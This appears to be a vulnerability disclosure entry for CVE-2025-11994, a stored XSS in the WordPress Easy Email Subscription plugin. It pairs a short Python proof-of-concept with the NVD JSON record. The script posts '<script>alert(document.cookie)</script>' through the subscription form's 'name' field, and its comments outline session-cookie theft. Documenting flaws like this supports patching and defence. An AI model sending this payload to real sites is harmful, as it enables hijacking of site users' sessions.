CVE-2025-11994

import requests # CVE-2025-11994 PoC - Stored XSS in Easy Email Subscription Plugin # Target: WordPress site with Easy Email Subscription plugin <= 1.3 target_url = "http://target-site.com/" # Malicious payload for stored XSS via 'name' parameter xss_payload = '<script>alert(document.cookie)</script>' # Subscribe form submission data form_data = { 'email': '[email protected]', 'name': xss_payload, 'action': 'subscribe' # or appropriate action parameter } # Send subscription request with XSS payload try: response = requests.post(target_url, data=form_data, timeout=10) print(f"Request sent. Status: {response.status_code}") print("If successful, the XSS payload will be stored and executed when viewed.") except requests.RequestException as e: print(f"Request failed: {e}") # Note: This PoC demonstrates the vulnerability. In real attacks: # 1. Attacker submits XSS payload via name parameter # 2. Payload is stored in database without sanitization # 3. When admin or users view subscription list, XSS executes # 4. Attacker can steal session cookies or perform actions as victim

{"cve": {"id": "CVE-2025-11994", "sourceIdentifier": "[email protected]", "published": "2025-11-12T11:15:40.180", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Email Subscription plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/email-subscription-with-secure-captcha/tags/1.3/simple-email-subscription.php", "source": "[email protected]"}, {"url": "https://plugins.svn.wordpress.org/email-subscription-with-secure-captcha/tags/1.3/subscriber-form.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388578%40email-subscription-with-secure-captcha&new=3388578%40email-subscription-with-secure-captcha&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5bb14c1-8713-4aa1-b50a-53bed07a5f80?source=cve", "source": "[email protected]"}]}}